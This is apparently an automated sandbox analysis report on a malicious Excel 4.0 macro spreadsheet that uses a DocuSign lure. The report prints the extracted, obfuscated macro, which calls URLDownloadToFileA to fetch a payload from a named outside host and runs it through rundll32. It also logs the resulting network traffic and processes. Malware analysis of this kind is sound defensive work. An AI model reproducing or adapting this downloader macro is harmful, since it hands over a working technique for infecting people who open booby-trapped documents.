                  SHA1:155838665FF2509329778E2447BE9B417CB8B0F3
                  SHA-256:15666D3495FC4D0D021491B4E66C8F8BF2EB2FCF38741C5F6D7CC3B876324440
                  SHA-512:A8FF19B5D646669D1A0E28BD71D5244AA34414E56EF3ACA2DD93BB405FE5114F183A49D4FD0718EF9DD008973C97599BB2C27DD435FC18E86CEBF66D9561205B
                  Malicious:false
                  Reputation:low
                  Preview: ........g2.........................\.p.... B.....a.........=...........................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...............

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 8 08:28:15 2021, Security: 0
                  Entropy (8bit):7.606041071167239
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:document-1429954472.xls
                  File size:323072
                  MD5:de9de1ff91dd0501f1405ce027fb5941
                  SHA1:826804c571db7b1c892160c8c4c05c2d5d015d63
                  SHA256:26acece82b024fc2b5306a52189db24a8742c11cc9ebbc84ab6a5dca8672bc0c
                  SHA512:39613ef3a2854ec0125fa3f5a50ad8b320f0e63a0b0cdfc5b60fb0a4ec6b5efbd2d74044570616c78229e215d29bb9bb1feb4d589b9c56bff2be88eeb8d408ec
                  SSDEEP:6144:BcKoSsxzNDZLDZjlbR868O8KlVH33dq7uDphYHceXVhca+fMHLty/xcl8OR4PiAO:EeLUIRfUI5uXL6nDJoc5
                  File Content Preview:........................>.......................u...........................p...q...r...s...t..................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "document-1429954472.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-08 08:28:15
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:917504

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.311136915093
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 96 00 00 00 02 00 00 00 e3 04 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.251468853718
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . W X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 311013
                  General
                  Stream Path:Workbook
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:311013
                  Entropy:7.7372453803
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                  Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE13(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA13(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&AF21,AE19&AE20&AE21&AE22&AE23&AE24&AE25&AE26&AE27&AE28&AE29&AE30&AE31&AE32&AE33&AE34&AE35&AE14,""JJCCBB"",0,A100,AF18,AF23,0)",,,,"=FORMULA.ARRAY(AE17,AE14)","=FORMULA.ARRAY(AH25&AH26&AH27&AH28&AH29&AH30&AH31,AF14)","=FORMULA.ARRAY(AI25&AI26&AI27&AI28&AI29,AG14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,=AB17(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF13(),=AG13(),=AA10(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AF14&""2 ""&AF18&AG14&""egisterServer"")",,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,..\iojhsfgv.dvers,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,r,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,u,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,n,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,d,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,l,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,T,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://fastswitch.org/ds/0702.gif,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Apr 9, 2021 22:09:42.066481113 CEST4916580192.168.2.2247.244.191.15
                  Apr 9, 2021 22:09:42.261116028 CEST804916547.244.191.15192.168.2.22
                  Apr 9, 2021 22:09:42.261199951 CEST4916580192.168.2.2247.244.191.15
                  Apr 9, 2021 22:09:42.261943102 CEST4916580192.168.2.2247.244.191.15
                  Apr 9, 2021 22:09:42.457134008 CEST804916547.244.191.15192.168.2.22
                  Apr 9, 2021 22:09:43.020963907 CEST804916547.244.191.15192.168.2.22
                  Apr 9, 2021 22:09:43.021126032 CEST4916580192.168.2.2247.244.191.15
                  Apr 9, 2021 22:09:43.021311998 CEST4916580192.168.2.2247.244.191.15
                  Apr 9, 2021 22:09:43.022376060 CEST804916547.244.191.15192.168.2.22
                  Apr 9, 2021 22:09:43.022488117 CEST4916580192.168.2.2247.244.191.15
                  Apr 9, 2021 22:09:43.215965033 CEST804916547.244.191.15192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Apr 9, 2021 22:09:41.753401995 CEST5219753192.168.2.228.8.8.8
                  Apr 9, 2021 22:09:42.050138950 CEST53521978.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Apr 9, 2021 22:09:41.753401995 CEST192.168.2.228.8.8.80x2c09Standard query (0)fastswitch.orgA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Apr 9, 2021 22:09:42.050138950 CEST8.8.8.8192.168.2.220x2c09No error (0)fastswitch.org47.244.191.15A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • fastswitch.org

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.224916547.244.191.1580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Apr 9, 2021 22:09:42.261943102 CEST0OUTGET /ds/0702.gif HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: fastswitch.org
                  Connection: Keep-Alive
                  Apr 9, 2021 22:09:43.020963907 CEST1INHTTP/1.1 503 Service Unavailable
                  Date: Fri, 09 Apr 2021 20:09:42 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.6.31
                  X-Powered-By: PHP/5.6.31
                  Content-Length: 79
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 37 30 32 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                  Data Ascii: <h1>Not Found.</h1>The requested URL /ds/0702.gif was not found on this server.


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:22:09:40
                  Start date:09/04/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f9e0000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:22:09:44
                  Start date:09/04/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                  Imagebase:0xff060000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >